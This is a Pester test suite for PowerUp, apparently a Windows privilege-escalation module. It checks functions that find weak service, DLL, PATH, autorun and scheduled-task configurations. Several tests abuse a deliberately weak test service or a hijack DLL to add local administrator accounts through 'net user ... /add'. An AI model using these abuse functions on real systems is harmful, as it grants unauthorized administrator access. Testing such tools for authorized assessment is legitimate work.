Set-StrictMode -Version Latest $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent $ModuleRoot = Resolve-Path "$TestScriptRoot\.." $ModuleManifest = "$ModuleRoot\Privesc\Privesc.psd1" Remove-Module [P]rivesc Import-Module $ModuleManifest -Force -ErrorAction Stop # import PowerUp.ps1 manually so we expose the helper functions for testing $PowerUpFile = "$ModuleRoot\Privesc\PowerUp.ps1" Import-Module $PowerUpFile -Force -ErrorAction Stop function Get-RandomName { $r = 1..8 | ForEach-Object{Get-Random -max 26} return ('abcdefghijklmnopqrstuvwxyz'[$r] -join '') } function Test-IsAdmin { return ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") } ######################################################## # # PowerUp helpers functions. # ######################################################## Describe 'Get-ModifiableFile' { It 'Should output a file path.' { $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" $Null | Out-File -FilePath $FilePath -Force try { $Output = Get-ModifiableFile -Path $FilePath $Output | Should Be $FilePath } finally { $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue } } It 'Should extract a modifiable file specified as an argument in a command string.' { $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" $Null | Out-File -FilePath $FilePath -Force $CmdPath = "'C:\Windows\System32\nonexistent.exe' -i '$FilePath'" try { $Output = Get-ModifiableFile -Path $FilePath $Output | Should Be $FilePath } finally { $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue } } It 'Should return no results for a non-existent path.' { $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" $Output = Get-ModifiableFile -Path $FilePath $Output | Should BeNullOrEmpty } It 'Should accept a Path over the pipeline.' { $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" $Output = $FilePath | Get-ModifiableFile $Output | Should BeNullOrEmpty } } ######################################################## # # PowerUp service enumeration functions. # ######################################################## Describe 'Get-ServiceUnquoted' { if(-not $(Test-IsAdmin)) { Throw "'Get-ServicePermission' Pester test needs local administrator privileges." } It "Should not throw." { {Get-ServiceUnquoted} | Should Not Throw } It 'Should return service with a space in an unquoted binPath.' { $ServiceName = Get-RandomName $ServicePath = "C:\Program Files\service.exe" sc.exe create $ServiceName binPath= $ServicePath | Should Match "SUCCESS" Start-Sleep -Seconds 1 $Output = Get-ServiceUnquoted | Where-Object { $_.ServiceName -eq $ServiceName } sc.exe delete $ServiceName | Should Match "SUCCESS" $Output | Should Not BeNullOrEmpty $Output.ServiceName | Should Be $ServiceName $Output.Path | Should Be $ServicePath } It 'Should not return services with a quoted binPath.' { $ServiceName = Get-RandomName $ServicePath = "'C:\Program Files\service.exe'" sc.exe create $ServiceName binPath= $ServicePath | Should Match "SUCCESS" Start-Sleep -Seconds 1 $Output = Get-ServiceUnquoted | Where-Object { $_.ServiceName -eq $ServiceName } sc.exe delete $ServiceName | Should Match "SUCCESS" $Output | Should BeNullOrEmpty } } Describe 'Get-ServiceFilePermission' { if(-not $(Test-IsAdmin)) { Throw "'Get-ServiceFilePermission' Pester test needs local administrator privileges." } It 'Should not throw.' { {Get-ServiceFilePermission} | Should Not Throw } It 'Should return a service with a modifiable service binary.' { try { $ServiceName = Get-RandomName $ServicePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" + ".exe" $Null | Out-File -FilePath $ServicePath -Force sc.exe create $ServiceName binPath= $ServicePath | Should Match "SUCCESS" $Output = Get-ServiceFilePermission | Where-Object { $_.ServiceName -eq $ServiceName } sc.exe delete $ServiceName | Should Match "SUCCESS" $Output | Should Not BeNullOrEmpty $Output.ServiceName | Should Be $ServiceName $Output.Path | Should Be $ServicePath } finally { $Null = Remove-Item -Path $ServicePath -Force } } It 'Should not return a service with a non-existent service binary.' { $ServiceName = Get-RandomName $ServicePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" + ".exe" sc.exe create $ServiceName binPath= $ServicePath | Should Match "SUCCESS" $Output = Get-ServiceFilePermission | Where-Object { $_.ServiceName -eq $ServiceName } sc.exe delete $ServiceName | Should Match "SUCCESS" $Output | Should BeNullOrEmpty } } Describe 'Get-ServicePermission' { if(-not $(Test-IsAdmin)) { Throw "'Get-ServicePermission' Pester test needs local administrator privileges." } It 'Should not throw.' { {Get-ServicePermission} | Should Not Throw } It 'Should return a modifiable service.' { $Output = Get-ServicePermission | Where-Object { $_.ServiceName -eq 'Dhcp'} $Output | Should Not BeNullOrEmpty } } Describe 'Get-ServiceDetail' { It 'Should return results for a valid service.' { $Output = Get-ServiceDetail -ServiceName Dhcp $Output | Should Not BeNullOrEmpty } It 'Should return not results for an invalid service.' { $Output = Get-ServiceDetail -ServiceName NonExistent123 $Output | Should BeNullOrEmpty } It 'Should accept a service name on the pipeline.' { $Output = "Dhcp" | Get-ServiceDetail $Output | Should Not BeNullOrEmpty } } ######################################################## # # PowerUp service abuse functions. # ######################################################## Describe 'Invoke-ServiceAbuse' { if(-not $(Test-IsAdmin)) { Throw "'Invoke-ServiceAbuse' Pester test needs local administrator privileges." } BeforeEach { $ServicePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" + ".exe" $Null = sc.exe create "PowerUpService" binPath= $ServicePath } AfterEach { $Null = sc.exe delete "PowerUpService" $Null = $(net user john /delete >$Null 2>&1) } It 'Should abuse a vulnerable service to add a local administrator with default options.' { $Output = Invoke-ServiceAbuse -ServiceName "PowerUpService" $Output.Command | Should Match "net" if( -not ($(net localgroup Administrators) -match "john")) { Throw "Local user 'john' not created." } } It 'Should accept a service name on the pipeline.' { $Output = "PowerUpService" | Invoke-ServiceAbuse $Output.Command | Should Match "net" if( -not ($(net localgroup Administrators) -match "john")) { Throw "Local user 'john' not created." } } It 'User should not be created for a non-existent service.' { $Output = Invoke-ServiceAbuse -ServiceName "NonExistentService456" $Output.Command | Should Match "Not found" if( ($(net localgroup Administrators) -match "john")) { Throw "Local user 'john' should not have been created for non-existent service." } } It 'Should accept custom user/password arguments.' { $Output = Invoke-ServiceAbuse -ServiceName "PowerUpService" -Username PowerUp -Password 'PASSword123!' $Output.Command | Should Match "net" if( -not ($(net localgroup Administrators) -match "PowerUp")) { Throw "Local user 'PowerUp' not created." } $Null = $(net user PowerUp /delete >$Null 2>&1) } It 'Should accept a custom command.' { $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" $Output = Invoke-ServiceAbuse -ServiceName "PowerUpService" -Command "net user testing Password123! /add" if( -not ($(net user) -match "testing")) { Throw "Custom command failed." } $Null = $(net user testing /delete >$Null 2>&1) } } Describe 'Install-ServiceBinary' { if(-not $(Test-IsAdmin)) { Throw "'Install-ServiceBinary' Pester test needs local administrator privileges." } BeforeEach { $ServicePath = "$(Get-Location)\powerup.exe" $Null | Out-File -FilePath $ServicePath -Force $Null = sc.exe create "PowerUpService" binPath= $ServicePath } AfterEach { try { $Null = Invoke-ServiceStop -ServiceName PowerUpService $Null = sc.exe delete "PowerUpService" $Null = $(net user john /delete >$Null 2>&1) } finally { if(Test-Path "$(Get-Location)\powerup.exe") { $Null = Remove-Item -Path "$(Get-Location)\powerup.exe" -Force -ErrorAction SilentlyContinue } if(Test-Path "$(Get-Location)\powerup.exe.bak") { $Null = Remove-Item -Path "$(Get-Location)\powerup.exe.bak" -Force -ErrorAction SilentlyContinue } } } It 'Should abuse a vulnerable service binary to add a local administrator with default options.' { $Output = Install-ServiceBinary -ServiceName "PowerUpService" $Output.Command | Should Match "net" $Null = Invoke-ServiceStart -ServiceName PowerUpService Start-Sleep -Seconds 3 if( -not ($(net localgroup Administrators) -match "john")) { Throw "Local user 'john' not created." } $Null = Invoke-ServiceStop -ServiceName PowerUpService $Output = Restore-ServiceBinary -ServiceName PowerUpService "$(Get-Location)\powerup.exe.bak" | Should Not Exist } It 'Should accept a service name on the pipeline.' { $Output = "PowerUpService" | Install-ServiceBinary $Output.Command | Should Match "net" $Null = Invoke-ServiceStart -ServiceName PowerUpService Start-Sleep -Seconds 3 if( -not ($(net localgroup Administrators) -match "john")) { Throw "Local user 'john' not created." } $Null = Invoke-ServiceStop -ServiceName PowerUpService $Output = Restore-ServiceBinary -ServiceName PowerUpService "$(Get-Location)\powerup.exe.bak" | Should Not Exist } It 'User should not be created for a non-existent service.' { $Output = Install-ServiceBinary -ServiceName "NonExistentService456" $Output.Command | Should Match "Not found" } It 'Should accept custom user/password arguments.' { $Output = Install-ServiceBinary -ServiceName "PowerUpService" -Username PowerUp -Password 'PASSword123!' $Output.Command | Should Match "net" $Null = Invoke-ServiceStart -ServiceName PowerUpService Start-Sleep -Seconds 3 if( -not ($(net localgroup Administrators) -match "PowerUp")) { Throw "Local user 'PowerUp' not created." } $Null = $(net user PowerUp /delete >$Null 2>&1) $Output = Restore-ServiceBinary -ServiceName PowerUpService "$(Get-Location)\powerup.exe.bak" | Should Not Exist } It 'Should accept a custom command.' { $Output = Install-ServiceBinary -ServiceName "PowerUpService" -Command "net user testing Password123! /add" $Output.Command | Should Match "net" $Null = Invoke-ServiceStart -ServiceName PowerUpService Start-Sleep -Seconds 3 if( -not ($(net user) -match "testing")) { Throw "Custom command failed." } $Null = $(net user testing /delete >$Null 2>&1) $Output = Restore-ServiceBinary -ServiceName PowerUpService "$(Get-Location)\powerup.exe.bak" | Should Not Exist } } ######################################################## # # PowerUp .dll hijacking functions. # ######################################################## Describe 'Find-DLLHijack' { It 'Should return results.' { $Output = Find-DLLHijack $Output | Should Not BeNullOrEmpty } } Describe 'Find-PathHijack' { if(-not $(Test-IsAdmin)) { Throw "'Find-PathHijack' Pester test needs local administrator privileges." } It 'Should find a hijackable %PATH% folder.' { New-Item -Path C:\PowerUpTest\ -ItemType directory -Force try { $OldPath = $Env:PATH $Env:PATH += ';C:\PowerUpTest\' $Output = Find-PathHijack | Where-Object {$_.HijackablePath -like "*PowerUpTest*"} $Env:PATH = $OldPath $Output.HijackablePath | Should Be 'C:\PowerUpTest\' } catch { $Null = Remove-Item -Recurse -Force 'C:\PowerUpTest\' -ErrorAction SilentlyContinue } } } # won't actually execute on Win8+ with the wlbsctrl.dll method Describe 'Write-HijackDll' { It 'Should write a .dll that executes a custom command.' { try { Write-HijackDll -OutputFile "$(Get-Location)\powerup.dll" -Command "net user testing Password123! /add" "$(Get-Location)\powerup.dll" | Should Exist "$(Get-Location)\debug.bat" | Should Exist } finally { $Null = Remove-Item -Path "$(Get-Location)\powerup.dll" -Force -ErrorAction SilentlyContinue $Null = Remove-Item -Path "$(Get-Location)\debug.bat" -Force -ErrorAction SilentlyContinue } } } ######################################################## # # PowerUp registry checks. # ######################################################## Describe 'Get-RegAlwaysInstallElevated' { It 'Should not throw.' { {Get-ServicePermission} | Should Not Throw } } Describe 'Get-RegAutoLogon' { It 'Should not throw.' { {Get-ServicePermission} | Should Not Throw } } Describe 'Get-VulnAutoRun' { if(-not $(Test-IsAdmin)) { Throw "'Get-VulnAutoRun' Pester test needs local administrator privileges." } It 'Should not throw.' { {Get-VulnAutoRun} | Should Not Throw } It 'Should find a vulnerable autorun.' { try { $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" $Null | Out-File -FilePath $FilePath -Force $Null = Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name PowerUp -Value "vuln.exe -i '$FilePath'" $Output = Get-VulnAutoRun | ?{$_.Path -like "*$FilePath*"} $Null = Remove-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name PowerUp $Output.ModifiableFile | Should Be $FilePath } finally { $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue } } } ######################################################## # # PowerUp misc. checks. # ######################################################## Describe 'Get-VulnSchTask' { if(-not $(Test-IsAdmin)) { Throw "'Get-VulnSchTask' Pester test needs local administrator privileges." } It 'Should not throw.' { {Get-VulnSchTask} | Should Not Throw } It 'Should find a vulnerable config file for a binary specified in a schtask.' { try { $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" $Null | Out-File -FilePath $FilePath -Force $Null = schtasks.exe /create /tn PowerUp /tr "vuln.exe -i '$FilePath'" /sc onstart /ru System /f $Output = Get-VulnSchTask | Where-Object {$_.TaskName -eq 'PowerUp'} $Null = schtasks.exe /delete /tn PowerUp /f $Output.TaskFilePath | Should Be $FilePath } finally { $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue } } } Describe 'Get-UnattendedInstallFile' { if(-not $(Test-IsAdmin)) { Throw "'Get-UnattendedInstallFile' Pester test needs local administrator privileges." } It 'Should not throw.' { {Get-UnattendedInstallFile} | Should Not Throw } It 'Should return a leftover autorun' { $FilePath = Join-Path $Env:WinDir "\System32\Sysprep\unattend.xml" try { $Null | Out-File -FilePath $FilePath -Force $Output = Get-UnattendedInstallFile $Output | Should Not BeNullOrEmpty } finally { $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue } } } Describe 'Get-Webconfig' { It 'Should not throw.' { {Get-Webconfig} | Should Not Throw } } Describe 'Get-ApplicationHost' { It 'Should not throw.' { {Get-ApplicationHost} | Should Not Throw } } Describe 'Invoke-AllChecks' { It 'Should return results to stdout.' { $Output = Invoke-AllChecks $Output | Should Not BeNullOrEmpty } It 'Should produce a HTML report with -HTMLReport.' { $Output = Invoke-AllChecks -HTMLReport $Output | Should Not BeNullOrEmpty $HtmlReportFile = "$($Env:ComputerName).$($Env:UserName).html" $HtmlReportFile | Should Exist $Null = Remove-Item -Path $HtmlReportFile -Force -ErrorAction SilentlyContinue } } |